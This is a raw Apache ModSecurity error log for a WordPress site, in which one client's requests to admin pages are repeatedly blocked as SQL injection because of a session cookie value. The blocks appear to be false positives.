[Mon May 11 22:21:36.930196 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI6UKFW67LJTsgN3jQKyAAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:36.930482 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI6UKFW67LJTsgN3jQKyAAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:37.471707 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6UKFW67LJTsgN3jQKyAAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:37.732953 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI6UaFW67LJTsgN3jQKyQAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:37.733273 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI6UaFW67LJTsgN3jQKyQAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:38.092506 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6UaFW67LJTsgN3jQKyQAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:38.943916 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI6UqFW67LJTsgN3jQKywAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:38.944228 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI6UqFW67LJTsgN3jQKywAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:39.609417 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6UqFW67LJTsgN3jQKywAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:40.452452 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI6VKFW67LJTsgN3jQKzwAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:40.452736 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI6VKFW67LJTsgN3jQKzwAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:41.048612 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6VKFW67LJTsgN3jQKzwAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:41.749533 2026] [security2:error] [pid 1601130:tid 1601174] [client 43.128.69.143:56064] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/"] [unique_id "agI6VXEgAO_835W6c1mU1QAAAFg"], referer: https://www.rentparadise.fr/
[Mon May 11 22:21:41.844070 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI6VaFW67LJTsgN3jQK0QAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:41.844375 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI6VaFW67LJTsgN3jQK0QAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:42.465730 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6VaFW67LJTsgN3jQK0QAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:43.540866 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI6V6FW67LJTsgN3jQK0wAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:43.541180 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI6V6FW67LJTsgN3jQK0wAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:44.102479 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6V6FW67LJTsgN3jQK0wAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:45.653879 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI6WaFW67LJTsgN3jQK1gAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:45.654199 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/index.php"] [unique_id "agI6WaFW67LJTsgN3jQK1gAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:46.279343 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6WaFW67LJTsgN3jQK1gAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:46.857863 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI6WqFW67LJTsgN3jQK2AAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:46.858181 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/"] [unique_id "agI6WqFW67LJTsgN3jQK2AAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:47.212029 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6WqFW67LJTsgN3jQK2AAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:51.149691 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI6X6FW67LJTsgN3jQK3AAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:51.150032 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/profile.php"] [unique_id "agI6X6FW67LJTsgN3jQK3AAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:51.818452 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6X6FW67LJTsgN3jQK3AAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:52.541178 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI6YKFW67LJTsgN3jQK3gAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:52.541540 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/edit.php"] [unique_id "agI6YKFW67LJTsgN3jQK3gAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:53.048459 2026] [core:error] [pid 1605480:tid 1605538] (13)Permission denied: [client 195.114.15.48:54124] AH00132: file permissions deny server access: /home/giloursf/public_html/wp-content/uploads/wpo/wpo-plugins-tables-list.json
[Mon May 11 22:21:53.835670 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6YKFW67LJTsgN3jQK3gAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:54.039023 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI6YqFW67LJTsgN3jQK4AAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:54.039316 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-admin/plugins.php"] [unique_id "agI6YqFW67LJTsgN3jQK4AAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:54.707974 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=5,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): SQL Injection Attack Detected via libinjection"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agI6YqFW67LJTsgN3jQK4AAAAAg"], referer: https://rentparadise.fr/wp-login.php
[Mon May 11 22:21:56.042416 2026] [security2:error] [pid 1588898:tid 1588907] [client 103.59.161.151:58386] ModSecurity: Warning. detected SQLi using libinjection with fingerprint 'n&1' [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-942-APPLICATION-ATTACK-SQLI.conf"] [line "43"] [id "942100"] [rev "1"] [msg "SQL Injection Attack Detected via libinjection"] [data "Matched Data: n&1 found within REQUEST_COOKIES:mphb_session: cd9c493f65d761cdf723586a1820a2c1||1778532584||1778532224"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "1"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-sqli"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "rentparadise.fr"] [uri "/wp-login.php"] [unique_id "agI6ZKFW67LJTsgN3jQK6AAAAAg"], referer: https://rentparadise.fr/wp-login.php
